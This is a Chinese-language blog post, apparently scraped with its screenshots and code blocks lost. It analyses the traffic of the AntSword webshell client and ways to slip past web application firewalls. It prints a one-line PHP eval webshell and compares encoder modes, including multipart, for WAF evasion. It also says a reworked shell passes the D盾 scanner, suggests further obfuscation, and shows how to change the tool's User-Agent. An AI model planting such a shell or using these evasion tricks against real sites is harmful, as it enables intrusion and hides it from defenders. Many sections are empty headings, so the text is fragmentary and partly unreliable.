1. 蚁剑流量分析
1. 环境如下
靶机 windows 2008 R2 攻击机器 win10 蚁剑2.0.4
1. 木马如下:
<?php eval($_POST[1]) ?>
蚁剑编辑器有如下几种
还有一种传递方式
加上这个mulipart 发包之后。数据包会像如下这样
multipart/form-data
这样的一种传值方式。如果不懂如下链接 https://blog.csdn.net/supwuq/article/details/50765149
这种方式可以干扰waf的判断。有时候可以达到一种绕过waf 的效果
2. 流量如下:
蚁剑流量((默认)
蚁剑流量 Random 模式
蚁剑 base64模式
Chr 模式
Chr16
Ro13
还有是加上multipart 模式的情况下
默认模式
随机模式
Base64
Chr 模式
Chr16
Ro13
如上是执行 了一个whoami 或者dir 命令。测试一两个sql语句尝试一下
执行一个select * from users;
3.分析流量 首先分析没有加上multipart 的情况。你会发现url 转码之后都是一些如下的函数例如
第二个
第三个
一些敏感函数比如@str_rot13 chr(105) @ini_set 这种类型的。常规waf 可以拦截的很死
再看看 multipart 模式下的情况相对 默认模式下的情况好多了。但是还有一个共性就是@eval 函数。之类的。也是不能完美的绕过waf 的
看了一下师傅的这篇文章https://xz.aliyun.com/t/4000
测试了一下
代码如下:
然后执行的流量如下:
这样一个效果之后,就没有任何的一个铭感信息了。然后就是一个木马部分了
这个马子还可以过D盾。建议可以再嵌套几次。或者eval 那个地方可以拼接一下
蚁剑的连接方式如下:
更改UA 在modules/request.js 中 UA 如下:
const USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36';
结后语:如果碰到这种流量丢包的waf 也没辙